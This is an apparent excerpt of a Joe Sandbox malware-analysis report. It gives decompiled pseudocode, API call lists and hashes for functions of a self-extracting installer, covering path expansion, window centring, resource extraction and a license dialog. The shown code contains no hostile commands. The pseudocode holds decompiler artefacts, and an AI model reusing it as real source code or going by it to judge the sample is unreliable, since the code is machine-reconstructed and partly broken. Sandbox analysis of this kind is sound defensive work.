                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t64 = __ecx;
                                                                                                                                                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                        					GetModuleFileNameA( *0xc9a3c,  &_v268, 0x104);
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_t17 =  *_t64;
                                                                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                        						 *_t65 =  *_t64;
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t65[1] = _t64[1];
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *_t64 != 0x23) {
                                                                                                                                                                                                        							L19:
                                                                                                                                                                                                        							_t65 = CharNextA(_t65);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 = CharNextA(_t64);
                                                                                                                                                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                        									if( *_t64 == 0x23) {
                                                                                                                                                                                                        										goto L19;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E000C1680(_t65, E000C17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        									_t52 = _t65;
                                                                                                                                                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                        									_t60 = _t14;
                                                                                                                                                                                                        									do {
                                                                                                                                                                                                        										_t32 =  *_t52;
                                                                                                                                                                                                        										_t52 =  &(_t52[1]);
                                                                                                                                                                                                        									} while (_t32 != 0);
                                                                                                                                                                                                        									goto L17;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								E000C65E8( &_v268);
                                                                                                                                                                                                        								_t55 =  &_v268;
                                                                                                                                                                                                        								_t62 = _t55 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t34 =  *_t55;
                                                                                                                                                                                                        									_t55 = _t55 + 1;
                                                                                                                                                                                                        								} while (_t34 != 0);
                                                                                                                                                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                        									 *_t38 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E000C1680(_t65, E000C17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        								_t59 = _t65;
                                                                                                                                                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                        								_t60 = _t12;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t42 =  *_t59;
                                                                                                                                                                                                        									_t59 =  &(_t59[1]);
                                                                                                                                                                                                        								} while (_t42 != 0);
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t64 = CharNextA(_t64);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *_t65 = _t17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 000C2AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 000C2AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 000C2B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 000C2B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 000C2B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 000C2BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: 29a9f0c91c82610f7b2ec294d134cdf97f9acb87961390c9ff646c626e3e1a4b
                                                                                                                                                                                                        • Instruction ID: f66dbde6ea48b9d259d2aa1527de0c4cdcc0ff587b9aed882904724d3c3169ee
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29a9f0c91c82610f7b2ec294d134cdf97f9acb87961390c9ff646c626e3e1a4b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C44107346042455FEB559F348C54FFE7BA99F57304F18009EE8C283642DB398E46CB51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E000C43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				struct tagRECT _v24;
                                                                                                                                                                                                        				struct tagRECT _v40;
                                                                                                                                                                                                        				struct HWND__* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				int _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				int _v60;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				struct HWND__* _t63;
                                                                                                                                                                                                        				struct HWND__* _t67;
                                                                                                                                                                                                        				struct HWND__* _t68;
                                                                                                                                                                                                        				struct HDC__* _t69;
                                                                                                                                                                                                        				int _t72;
                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t63 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                        				_t68 = __edx;
                                                                                                                                                                                                        				_v44 = __ecx;
                                                                                                                                                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                        				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                        				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                        				_t69 = GetDC(_v44);
                                                                                                                                                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                        				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                        				_t56 = _v48;
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                        				_t67 = 0;
                                                                                                                                                                                                        				if(_t72 >= 0) {
                                                                                                                                                                                                        					_t63 = _v52;
                                                                                                                                                                                                        					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                        						_t72 = _t63 - _t56;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t72 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                        				if(_t59 >= 0) {
                                                                                                                                                                                                        					_t63 = _v60;
                                                                                                                                                                                                        					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                        						_t59 = _t63 - _t53;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t59 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                        			}

























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 000C43F1
                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 000C440B
                                                                                                                                                                                                        • GetDC.USER32(?), ref: 000C4423
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 000C442E
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 000C443A
                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 000C4447
                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 000C44A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2212493051-0
                                                                                                                                                                                                        • Opcode ID: 02aefc7613aae5094556930becf8361ecc4bfabdd9e43697f5fff14f363c7832
                                                                                                                                                                                                        • Instruction ID: 8a1e2c2d545ddd874143114031d23cdc9880aab24321b5b6ee42843bf56a99c6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02aefc7613aae5094556930becf8361ecc4bfabdd9e43697f5fff14f363c7832
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F311C72E00119AFDB14CFB8DD89EEEBBB5FB89314F254169F805B3250DA346D058B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E000C6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				struct HRSRC__* _t21;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				struct HINSTANCE__* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                        				_t46 = 0;
                                                                                                                                                                                                        				_v32 = __ecx;
                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                        				_t36 = 1;
                                                                                                                                                                                                        				E000C171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t51 = _t51 + 0x10;
                                                                                                                                                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                                        						 *0xc9124 = 0x80070714;
                                                                                                                                                                                                        						_t36 = _t46;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                        						_t44 = _t5;
                                                                                                                                                                                                        						_t40 = _t44;
                                                                                                                                                                                                        						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                        						_t47 = _t6;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t26 =  *_t40;
                                                                                                                                                                                                        							_t40 = _t40 + 1;
                                                                                                                                                                                                        						} while (_t26 != 0);
                                                                                                                                                                                                        						_t41 = _t40 - _t47;
                                                                                                                                                                                                        						_t46 = _t51;
                                                                                                                                                                                                        						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                        						 *0xca288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                        						_t30 = _v32();
                                                                                                                                                                                                        						if(_t51 != _t51) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(_t45);
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							_t36 = 0;
                                                                                                                                                                                                        							FreeResource(??);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							FreeResource();
                                                                                                                                                                                                        							_v36 = _v36 + 1;
                                                                                                                                                                                                        							E000C171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                        							_t46 = 0;
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					return E000C6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C171E: _vsnprintf.MSVCRT ref: 000C1750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,000C51CA,00000004,00000024,000C2F71,?,00000002,00000000), ref: 000C62CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,000C51CA,00000004,00000024,000C2F71,?,00000002,00000000), ref: 000C62D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000C51CA,00000004,00000024,000C2F71,?,00000002,00000000), ref: 000C631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 000C6345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000C51CA,00000004,00000024,000C2F71,?,00000002,00000000), ref: 000C6357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: c78976f031ab326bfb304189c6e63a79014e15872e3ac469b43874dc84000c1e
                                                                                                                                                                                                        • Instruction ID: 7d3837226d25321136364ec6bc1c24dbd547b27afd004a5e56ec865dc3a454ea
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c78976f031ab326bfb304189c6e63a79014e15872e3ac469b43874dc84000c1e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8121D875A00219AFDB209FA4DC49EFF7B78FB45714B14011DF902A3241DB3A9D068BE1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E000C681F(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                        				void* _v172;
                                                                                                                                                                                                        				int* _v176;
                                                                                                                                                                                                        				int _v180;
                                                                                                                                                                                                        				int _v184;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t31;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t36 = __ebx;
                                                                                                                                                                                                        				_t19 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                        				_t41 =  *0xc81d8; // 0x0
                                                                                                                                                                                                        				_t43 = 0;
                                                                                                                                                                                                        				_v180 = 0xc;
                                                                                                                                                                                                        				_v176 = 0;
                                                                                                                                                                                                        				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                        					 *0xc81d8 = 0;
                                                                                                                                                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        						_t41 =  *0xc81d8; // 0x0
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t41 = 1;
                                                                                                                                                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t31 = RegQueryValueExA(_v172, 0xc1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                        							_t43 = _t31;
                                                                                                                                                                                                        							RegCloseKey(_v172);
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t40 =  &_v176;
                                                                                                                                                                                                        								if(E000C66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                        										 *0xc81d8 = _t41;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L12;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 000C686E
                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 000C68A7
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000C68CC
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,000C1140,00000000,?,?,0000000C), ref: 000C68F4
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 000C6902
                                                                                                                                                                                                          • Part of subcall function 000C66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,000C691A), ref: 000C6741
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 000C68C2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                        • API String ID: 3346862599-1109908249
                                                                                                                                                                                                        • Opcode ID: e2b18f5e924b05ec645ca0589956ac57d54f104c6aa9305a6bdb1a25fe7de7e4
                                                                                                                                                                                                        • Instruction ID: 9fa0f1929975788df63a4d7dcff8035aadfe27f4bd26c64a5430edf414ac2c6c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2b18f5e924b05ec645ca0589956ac57d54f104c6aa9305a6bdb1a25fe7de7e4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67318D31A002289FEB31CB11CC44FAEB7BCFB46768F1441A9E949A6250DB359E85CF52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C3A3F(void* __eflags) {
                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = "LICENSE";
                                                                                                                                                                                                        				_t1 = E000C468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				 *0xc8d4c = _t3;
                                                                                                                                                                                                        				if(_t3 != 0) {
                                                                                                                                                                                                        					_t19 = _t16;
                                                                                                                                                                                                        					if(E000C468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA( *0xc8d4c, "<None>") == 0) {
                                                                                                                                                                                                        							LocalFree( *0xc8d4c);
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xc9124 = 0;
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t9 = E000C6517(_t19, 0x7d1, 0, E000C3100, 0, 0);
                                                                                                                                                                                                        						LocalFree( *0xc8d4c);
                                                                                                                                                                                                        						if(_t9 != 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xc9124 = 0x800704c7;
                                                                                                                                                                                                        						L2:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E000C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree( *0xc8d4c);
                                                                                                                                                                                                        					 *0xc9124 = 0x80070714;
                                                                                                                                                                                                        					goto L2;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E000C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xc9124 = E000C6285();
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,000C2F64,?,00000002,00000000), ref: 000C3A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 000C3AB3
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                          • Part of subcall function 000C6285: GetLastError.KERNEL32(000C5BBC), ref: 000C6285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 000C3AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 000C3B13
                                                                                                                                                                                                          • Part of subcall function 000C6517: FindResourceA.KERNEL32(000C0000,000007D6,00000005), ref: 000C652A
                                                                                                                                                                                                          • Part of subcall function 000C6517: LoadResource.KERNEL32(000C0000,00000000,?,?,000C2EE8,00000000,000C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 000C6538
                                                                                                                                                                                                          • Part of subcall function 000C6517: DialogBoxIndirectParamA.USER32(000C0000,00000000,00000547,000C19E0,00000000), ref: 000C6557
                                                                                                                                                                                                          • Part of subcall function 000C6517: FreeResource.KERNEL32(00000000,?,?,000C2EE8,00000000,000C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 000C6560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,000C3100,00000000,00000000), ref: 000C3AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: aaca7c776ee2ed7d36c7798582c4b3b76eae8e5757099a39509a346dedbd2288
                                                                                                                                                                                                        • Instruction ID: 90e8e55e78bb539c19a3b5bd0737e026a286fbe687dbc310f220de8e78860229
                                                                                                                                                                                                        • Opcode Fuzzy Hash: aaca7c776ee2ed7d36c7798582c4b3b76eae8e5757099a39509a346dedbd2288
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F11DA713006016BE7245F32AC09F5F3AF9EBD6740B10802EBA42D61E1DA7D8C109765
                                                                                                                                                                                                        Uniqueness

